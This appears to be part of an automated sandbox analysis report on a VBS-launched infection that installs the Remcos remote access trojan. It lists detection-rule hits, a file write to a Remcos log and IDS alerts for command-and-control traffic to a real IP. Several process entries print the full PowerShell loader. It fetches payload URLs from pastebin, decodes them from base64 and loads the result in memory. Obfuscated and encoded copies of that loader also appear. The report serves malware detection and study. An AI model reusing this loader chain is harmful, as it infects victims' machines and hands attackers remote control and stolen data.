"[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 
'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 980, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 5480, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", 
CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] 
$dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , 
'____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 980, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 5480, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU
?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?

                    Stealing of Sensitive Information

                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7372, TargetFilename: C:\ProgramData\remcos\logs.dat
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:19.521177+0100 | 2020423 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:19.521177+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:22.031540+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:23.610045+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:25.190506+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:26.756293+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:28.312938+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:29.875749+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:31.453622+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:33.953405+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:35.531715+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:37.109960+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:38.675448+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:40.234871+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:41.817111+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:43.391319+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:44.969400+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:46.532179+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:48.095206+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:49.656958+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:51.220517+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:52.815631+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:54.375581+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:55.937978+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:57.672426+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:41:59.250597+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49766 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:00.815279+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49777 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:02.376348+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49783 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:03.938417+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49794 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:05.500475+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:07.079178+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49816 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:08.657245+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49824 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:10.238744+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49833 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:11.813179+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49844 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:13.377766+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49853 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:14.938356+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49861 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:16.438779+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49872 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:17.918640+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49881 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:19.344349+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49889 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:20.766372+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49899 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:22.244555+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49910 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:23.625678+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:24.962289+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49923 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:26.266463+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49934 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:27.570771+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49940 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:28.844251+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49951 | 181.236.112.169 | 2001 | TCP
